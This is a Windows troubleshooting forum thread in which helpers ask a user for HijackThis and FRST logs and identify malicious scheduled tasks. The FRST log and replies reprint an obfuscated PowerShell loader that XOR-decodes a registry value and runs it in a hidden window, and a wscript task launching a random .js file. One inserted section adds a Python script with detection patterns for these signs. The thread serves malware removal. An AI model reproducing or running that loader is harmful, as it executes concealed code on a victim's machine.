PC Ekspert Forum

PC Ekspert Forum (https://forum.pcekspert.com/index.php)
-   Operating systems (https://forum.pcekspert.com/forumdisplay.php?f=36)
-   -   Windows 10 - problems, troubleshooting (https://forum.pcekspert.com/showthread.php?t=272277)

domy_os 23.07.2023. 21:45

I'd say it's some malware, because that PowerShell task doesn't look legit to me; post a HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

As a precaution, disable script execution: run PowerShell as admin and paste this:

Code:

# Returns $true only if Windows Script Host is already disabled (Enabled = 0),
# $false if the key/value is missing, WSH is enabled, or the read fails.
try {
    if (-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")) { return $false }
    if ((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) { } else { return $false }
}
catch { return $false }
return $true

# and finally

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted


fre@k 24.07.2023. 01:18

Quote:

Originally Posted by domy_os (Post 3687397)
I'd say it's some malware, because that PowerShell task doesn't look legit to me; post a HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

As a precaution, disable script execution: run PowerShell as admin and paste this:

Code:

# Returns $true only if Windows Script Host is already disabled (Enabled = 0),
# $false if the key/value is missing, WSH is enabled, or the read fails.
try {
    if (-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")) { return $false }
    if ((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) { } else { return $false }
}
catch { return $false }
return $true

# and finally

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted


I typed this into PowerShell and it returned false.

Quote:

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:16:50, on 24.7.2023.
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.19041.1566)


Boot mode: Normal

Running processes:
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Program Files\Logitech Gaming Software\ArxApplets\Discord\logitechg_discord.exe
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Users\Boris\Desktop\HijackThis.exe

O17 - HKLM\System\CCS\Services\Tcpip\..\{d7fde4bf-e111-4e9b-a6c9-d207412f0933}: NameServer = 213.191.128.8,213.191.128.9
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Inc. - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Genuine Software Monitor Service (AGMService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service: eID DCS (AkdEidDcs) - Unknown owner - C:\Program Files\AKD\eID Middleware\Dcs.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: AMD Crash Defender Service - Unknown owner - C:\WINDOWS\System32\amdfendrsr.exe (file missing)
O23 - Service: AMD External Events Utility - AMD - C:\WINDOWS\System32\DriverStore\FileRepository\u0379219.inf_amd64_3649648678001de4\B378972\atiesrxx.exe
O23 - Service: AnyDesk Service (AnyDesk) - AnyDesk Software GmbH - C:\Program Files (x86)\AnyDesk\AnyDesk.exe
O23 - Service: ASUS Com Service (asComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AXSP\4.00.42\atkexComSvc.exe
O23 - Service: @%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100 (CredentialEnrollmentManagerUserSvc) - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: CredentialEnrollmentManagerUserSvc_63b49 - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: Dropbox Update Service (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox Update Service (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: DbxSvc - Unknown owner - C:\WINDOWS\system32\DbxSvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: EG Station Information Service - Unknown owner - C:\Esko\bg_prog_egsis_v010\bin_ix86\egsissrv.exe
O23 - Service: Esko Subscription Service - Esko BVBA - C:\Program Files (x86)\Common Files\Esko\SubscriptionService\SubscriptionService\SubscriptionService.exe
O23 - Service: Everything - voidtools - C:\Program Files\Everything\Everything.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FLEXlm License Manager - Flexera - C:\Esko\bg_prog_system_v010\bin_ix86\lmgrd.exe
O23 - Service: FlexNet Licensing Service - Flexera - C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
O23 - Service: FlexNet Licensing Service 64 - Flexera - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Google Chrome Elevation Service (GoogleChromeElevationService) (GoogleChromeElevationService) - Google LLC - C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.199\elevation_service.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) PROSet Monitoring Service - Unknown owner - C:\Windows\system32\IProsetMonitor.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Logitech Gaming Registry Service (LogiRegistryService) - Logitech Inc. - C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @oem127.inf,%SERVICE_FRIENDLY_NAME%;Nahimic service (NahimicService) - Unknown owner - C:\WINDOWS\system32\NahimicService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: Corel License Validation Service V2, Powered by arvato (PSI_SVC_2) - arvato digital services llc - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: Realtek Audio Universal Service (RtkAudioUniversalService) - Unknown owner - C:\WINDOWS\System32\RtkAudUService64.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Samsung UPD Utility Service (SamsungUPDUtilSvc) - Unknown owner - C:\Windows\SysWOW64\SecUPDUtilSvc.exe
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\WINDOWS\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001 (Sense) - Unknown owner - C:\Program Files (x86)\Windows Defender Advanced Threat Protection\MsSense.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\SgrmBroker.exe,-100 (SgrmBroker) - Unknown owner - C:\WINDOWS\system32\SgrmBroker.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\WINDOWS\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: @oem126.inf,%ss_conn_launcher.SvcDesc%;SAMSUNG Mobile USB Connectivity Launcher (ss_conn_launcher_service) - Unknown owner - C:\WINDOWS\System32\Samsung\EasySetup\ss_conn_launcher.exe (file missing)
O23 - Service: SAMSUNG Mobile Connectivity Service (ss_conn_service) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
O23 - Service: SAMSUNG Mobile Connectivity Service V2 (ss_conn_service2) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\28_ssconn2\conn\ss_conn_service2.exe
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\steamservice.exe
O23 - Service: Adobe SwitchBoard (SwitchBoard) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: VirtualBox system service (VBoxSDS) - Oracle Corporation - C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wacom Professional Service (WTabletServicePro) - Wacom Co. Ltd. - C:\Program Files\Tablet\Wacom\WTabletServicePro.exe

--
End of file - 10226 bytes

domy_os 25.07.2023. 20:02

Any changes? With this you can disable the script host completely...

Code:

New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue

I don't see anything suspicious in the HJT log, but post the FRST logs too...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Save it to the desktop, close all applications, run FRST as admin and upload FRST.txt and Addition.txt.

pogi 30.07.2023. 09:12

What do the green check marks on the desktop icons mean?

https://i.ibb.co/vYf7xrR/kvacice-PCE.jpg

xlr 30.07.2023. 09:21

The files/shortcuts are synced with OneDrive (or some other cloud/NAS - Dropbox, Synology...).

fre@k 05.08.2023. 22:40

Quote:

Originally Posted by domy_os (Post 3687787)
Any changes? With this you can disable the script host completely...

Code:

New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue

I don't see anything suspicious in the HJT log, but post the FRST logs too...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Save it to the desktop, close all applications, run FRST as admin and upload FRST.txt and Addition.txt.


Quote:

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )
So I've googled all of them, but I don't know what this one is tied to:

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
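The two entries quoted above are exactly what a triage pass over an FRST.txt should pull out automatically. The Python below is an added example for this thread, not FRST's own code and not anything the posters wrote: it parses the `Task:` lines of the "Scheduled Tasks" section and flags the patterns seen here (a task filed under Microsoft\Windows\ that really launches wscript/cmd/PowerShell, a hidden PowerShell window, iex, -bxor decoding of a registry blob, randomised keyword casing, and FRST's own `(No File)` / `ATTENTION` markers). The sample input is a constructed excerpt made from this thread's own lines.

```python
import re

# Added example for this thread (not FRST's code, not anything posted here):
# a triage pass over the "Scheduled Tasks (Whitelisted)" section of an FRST.txt.
TASK_RE = re.compile(
    r"^Task: \{(?P<guid>[0-9A-Fa-f-]+)\} - System32\\Tasks\\(?P<name>.+?) => (?P<action>.+)$"
)

# Generic interpreters; a task filed under Microsoft\Windows\ that runs one of
# these instead of a Microsoft component binary is the masquerade in the thread.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "cmd.exe", "powershell", "mshta.exe")

# Keywords whose spelling attackers randomise to dodge simple string matching.
# Any casing other than lower / UPPER / Capitalised / canonical counts as mangled.
KEYWORDS = {"powershell": {"PowerShell"}, "scriptblock": {"ScriptBlock"},
            "echo": set(), "iex": set(), "icm": set()}

INDICATORS = [  # (label, case-insensitive pattern applied to the task action)
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("xor-decode", r"-bxor\b"),
    ("registry-payload", r"get-itemproperty\s+-path\s+'hk"),
    ("script-host", r"\\(?:wscript|cscript|mshta)\.exe"),
    ("js-payload", r"\.js\b"),
    ("frst-attention", r"<==== ATTENTION"),
    ("no-file", r"\(No File\)"),
]


def parse_task(line):
    """Split one FRST 'Task:' line into guid, task path and action; None for other lines."""
    m = TASK_RE.match(line.strip())
    return m.groupdict() if m else None


def mangled_keywords(action):
    """Return the keywords that appear with randomised casing, e.g. 'POWERsHELl'."""
    found = []
    for kw, canonical in KEYWORDS.items():
        allowed = {kw, kw.upper(), kw.capitalize()} | canonical
        for m in re.finditer(r"\b" + kw + r"\b", action, re.IGNORECASE):
            if m.group(0) not in allowed:
                found.append(kw)
                break
    return found


def triage(line):
    """Return the parsed task plus a 'hits' list of tripped indicators, or None."""
    task = parse_task(line)
    if task is None:
        return None
    action = task["action"]
    hits = [label for label, pat in INDICATORS if re.search(pat, action, re.IGNORECASE)]
    # Microsoft-looking task path, but the action is a generic script interpreter.
    if task["name"].lower().startswith("microsoft\\windows\\") and any(
            host in action.lower() for host in SCRIPT_HOSTS):
        hits.append("ms-path-script-host")
    if mangled_keywords(action):
        hits.append("case-mangling")
    task["hits"] = hits
    return task


def triage_report(frst_text):
    """Return only the tasks that tripped at least one indicator, in file order."""
    results = (triage(line) for line in frst_text.splitlines())
    return [t for t in results if t and t["hits"]]


# Constructed sample: the header plus five task lines in the format of the thread's FRST.txt.
SAMPLE = r"""==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
"""

if __name__ == "__main__":
    for t in triage_report(SAMPLE):
        print(f"{t['guid']}  {t['name']}\n    {', '.join(t['hits'])}")
```

Run against a real FRST.txt it prints only the flagged tasks; the Adobe and Defender lines in the sample stay silent, the AutoKMS line trips only `no-file`, and the two masquerading Microsoft\Windows\ tasks light up several indicators at once.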

domy_os 05.08.2023. 23:26

I would remove these:

Code:

Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
 
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN

And disable these, then re-enable them if you get sound problems:

Code:

Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)

Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)


geronimo_2 05.08.2023. 23:34

Guys, ESET has started blocking the link to this thread. It's reporting some trojan. I guess it's because of all the code above, so it's freaking out :stoopid:

spiderhr 10.01.2024. 09:38

Ugh, it annoys me that I can't open a second File Explorer once I've opened one, I have to use Ctrl+N instead. Is there some hack to get around that? They really made a mess of it.

kopija 10.01.2024. 10:08

Quote:

Originally Posted by spiderhr (Post 3721200)
Ugh, it annoys me that I can't open a second File Explorer once I've opened one, I have to use Ctrl+N instead. Is there some hack to get around that? They really made a mess of it.


And how would you want to open it?

By the power of thought?

